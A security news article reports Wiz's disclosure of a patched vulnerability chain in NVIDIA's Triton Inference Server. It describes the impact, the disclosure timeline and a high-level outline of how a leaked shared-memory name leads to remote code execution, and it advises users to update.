Critical Vulnerabilities Found in NVIDIA’s Triton Inference Server – Infosecurity Magazine

A chain of critical vulnerabilities in NVIDIA's Triton Inference Server has been discovered by researchers, just two weeks after a Container Toolkit vulnerability was identified.

The Triton Inference Server is an open-source platform for running AI models on a scale.

The flaws discovered by Wiz can potentially allow a remote, unauthenticated attacker to gain complete control of the server, achieving remote code execution (RCE).

NVIDIA has assigned the following identifiers to this vulnerability chain: CVE-2025-23319, CVE-2025-23320 and CVE-2025-23334.

The researchers noted that a successful attack could lead to:

Model Theft: Stealing proprietary and expensive AI models
Data Breach: Intercepting sensitive data being processed by the models, such as user information or financial data
Response Manipulation: Manipulating the AI model's output to produce incorrect, biased or malicious responses
Pivoting: Using the compromised server as a beachhead to attack other systems within the organization's network

Wiz researchers disclosed the vulnerability chain to NVIDIA on May 15, and it was acknowledged by the tech firm on May 16.

A patch for the vulnerabilities was released via an NVIDIA security bulletin on August 4. Triton Inference Server users are strongly recommended to update to the latest version.

Wiz Details Attack Chain

In an August 4 blog post, the Wiz Research team detailed the overview of the vulnerabilities it discovered.

While the Triton architecture is designed to be a universal inference server which can deploy from any major AI framework (PyTorch, TensorFlow, etc.), the Wiz research focused on the Python backend because of its widespread usage.

During Wiz’s audit of the Python backend, a flaw was identified in its error handling mechanism, leading to the disclosure of its internal IPC shared memory region's unique name.

The returned error message appears as follows: {"error":"Failed to increase the shared memory pool size for key 'triton_python_backend_shm_region_4f50c226-b3d0-46e8-ac59-d4690b28b859'…"}

The disclosure of this name is the first critical step in the exploit chain, as it exposes an internal component that should remain private.

With the leaked name of the Python backend's internal IPC shared memory, an attacker can turn the public-facing API used in Triton against itself.

An attacker can therefore call the registration endpoint with the leaked internal key. Once the server accepts it, they can craft subsequent inference requests that use this region for input or output.

This provides the attacker with powerful read and write primitives into the Python backend's private memory, which also contains internal data and control structures related to its IPC mechanism, all performed through standard, legitimate API calls.

Since an attacker can now alter the Python backend's shared memory, they can cause unexpected behavior in the server. This capability can be leveraged to gain full control of the server.

This is the latest in a series of NVIDIA vulnerabilities disclosed by Wiz Research, including two container escapes: CVE-2025-23266 and CVE 2024-0132.

Image credit: Hepha1st0s / Shutterstock.com